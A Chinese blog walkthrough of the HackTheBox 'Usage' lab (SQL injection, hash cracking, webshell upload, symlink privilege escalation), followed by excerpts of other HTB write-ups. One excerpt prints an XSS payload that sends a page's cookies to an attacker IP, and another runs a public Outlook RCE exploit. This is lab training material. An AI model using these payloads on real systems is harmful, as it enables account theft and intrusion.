HTB-Usage-WP
先添加hosts
然后访问网页
目录扫描得到
admin.usage.htb子域名
在hosts中添加,然后查看
弱密码进不去,重新找洞,
可以根据框架寻找漏洞
注册账号看看
没事用,就是博客
漏洞暂时不知道版本,先不测试,继续找找输入框,看看有没有sql漏洞
忘记密码地方可以输入邮箱,测试发现有小问题,直接拉到sqlmap中跑
拉到本地,级别调最高进行测试
成功扫到库.进入博客库中查看admin密码
复制出来使用john爆破或者是hashcat爆破
hashid 查看加密方式
在hashcat中找到对应的代码
获取到正确密码
登录admin用户
没有如何有用信息,发现头像可以换,直接上传木马
编写木马
测试
但是有一个问题,马好像只能存在一分钟(甚至更短)所以上传成功后立马写shell弹到权限
尽量使用python吧
利用python升级成交互式shell
root.txt在网站根目录下
大致思路是
先能登录dash用户
然后想办法登录另外一个用户(因为另外一个用户sudo中可以运行一个脚本)
然后想办法登录root
目前我们通过shell进来的 dash密码也不知道,文件查找,找到第二个用户密码
在家目录下发现隐藏文件
直接ssh登录
登录成功后看看权限
运行这个发现是一个网站备份脚本
这题思路有点抽象
可以在.ssh中发现dath的rsa密钥,导入到kali中发现可以登录
然后再去找root的密钥,发现确实有这个密钥,思路就是网站备份的脚本可以将网站的内容全部备份,这样的话,我们可以设置一个
符号连接连接root_id_rsa到root.txt中然后进行备份,因为rootrsa有权限限制,所以备份的时候会将内容给暴露出来,然后将内容复制到kali中 使用rsa连接
创造连接发方法
然后运行网站备份脚本
得到密钥之后配置权限,连接即可
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 BenD!
相关推荐
2024-08-20
HTB-Mailing-WP
拿到ip先端口扫描 然后再hosts里面加上网址 打开网页查看 对网站进行信息收集,发现参数 是一个下载的参数,看看能不能找到漏洞,抓包测试 发现目录遍历漏洞,信息收集后发现这个网站是一个hmailserver的邮件系统,直接去网上找一下这个服务的安装说明和安装的配置文件位置 找到密码,找一个网站解一下md5 https://hashes.com/zh/decrypt/hash 得到账号和密码后直接登录telent发现什么都没有 信息收集找漏洞,发现有一个RCE漏洞 github:https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability 大概意思就是发送一个虚拟的文件,这个虚拟的文件可以获取到Windows的NTML(Windows的密码加密方式) python3 CVE-2024-21413.py –server mailing.htb –port 587 –username administrator@mailing.h...
2026-01-23
HTB-Imagery-WP
HTB-Imagery扫描靶机 1nmap -A -v 10.10.11.88 就两个端口,有个8000端口可以访问,把imagery.htb放到host然后访问一下 进入后可以看到右上角个注册和登录按钮,先注册然后登陆进去 有个upload按钮,可以上传图片格式的文件,先尝试上传图片 在自己的图库里面可以看到刚刚上传的图片,并且可以下载删除,但是不能传送和修改图片,估计需要admin账号,查看一下登陆框有没有xss漏洞 看来啥也没有,看一下页面,可以发现最底下有个有个Report bug的按钮 这个是用来报告图库的bug使用 测试一下有没有xss漏洞,用bp抓包,可以看到有返回请求,不断的发请求 利用xss漏洞拿到admin的cookie 1<img src=1 onerror="document.location='http://10.10.14.24/cxk/'+ document.cookie"></img> 成功的拿到了admin的cookie,然后将cookie写到后台,更新重新打开...
2026-01-03
HTB-Rustykey-WP
HTB-Rustykey条件:rr.parker / 8#t5HE8L!W3A 扫描靶机 1nmap -A -v -T4 10.10.11.75 得到了rustykey.htb域名,写到hosts里面,使用ldap协议获得UPN信息(userPrincipalName) 将ldap里面的Users表单导出做成用户表,然后使用bh导出内网环境 1bloodhound-python -u rr.parker -p '8#t5HE8L!W3A' -d rustykey.htb -ns 10.10.11.75 -c All --zip 可以看到HELPDESK组对T-COMPUTER3.RUSTYKEY.HTB主机有Addself作用 说明这个主机可以添加到这个组里面 然后查看一下HELPDESK组,可以修改这4个用户的密码,分别是 1234BB.MORGANGG.ANDERSONDD.ALIEE.REED 除了可以修改这四个用户的密码,还对PROTECTED OBJECTS这个组有AddMember的属性 然后继续分析其他的关系,在H...
2024-08-19
HTB-MagicGardens-WP(部分)
使用nmap对ip扫描发现域名,放进hosts中去访问80,还有5000存在docker 打开网站发现是一个卖花的 没什么可用信息,扫一下网站目录 有一个admin,访问查看 存在一个注册页面,查了一下有这个cms,但是具体版本没办法找到,所以先放一放 注册一个账号登录网页看看有没有信息,因为这是个卖花的,所以买一朵花看看 大概意思就是购买成功了,出示二维码可以折扣,我们找一下二维码 找了半天,发现在右上角 进入之后发现有三种卡可以升级 但是我升级的时候发现三张卡是不同的域名,鼠标悬停就可以显示 抓包看一下参数 bank是显示域名,将bank改成本地的IP地址,再用python搭建一个局域网看看有没有访问记录 有回显但是501报错了,用别的方法试一下api 没找到这个域名,那就把这个加进hosts中 这个报错是405,说明请求方式不对,那就改成POST请求 请求方式对了,但是缺少参数,或者是格式有问题,再进行修改,将POST参数加进去 把参数加进去之后回显了402报错,具体报错信息我查了,感觉 到这里我没思路了,大概就是需要触发条件,借鉴了一下...
2024-08-20
HTB-SolarLab-WP
现在hosts中添加 然后使用nmap进行扫描 开了smb服务和http,访问网页 一个倒计时网页,没啥用 回头看看smb服务能不能免密访问 可以空密码登录,并且有两个共享文件夹,查看文件夹内容 发现有几个文件夹,还有表格,先下载下来 发现了账号和密码,先记下来,在对网页进行信息收集 没有多余的网页,也没后台,感觉有问题,重新扫描端口,看看是不是藏了大端口,我最开始的nmap扫描只能扫描常见端口 猜想是对的,确实藏了一个端口(因为最开始我们在表格中获取到了passwd,肯定可以用得到),访问的时候会显示出错,需要把这个也加进hosts中 发现登录页面 结合最开始的那个表格,进行爆破,即可爆破出账号和密码 发现三个长度不一样的,尝试登录看看 第三个可以登录 试了一下全部报错沟八用没有,看样子只能找漏洞了 有洞!!!!! 这个漏洞的大概意思就是可以将html的代码自动识别到系统的python中进行运行,从而获得RCE,下面进行具体操作 shell编写 获得权限 获得user 下面肯定就是提权了,查看端口,发现开了两个端口,但是我们现在没办...
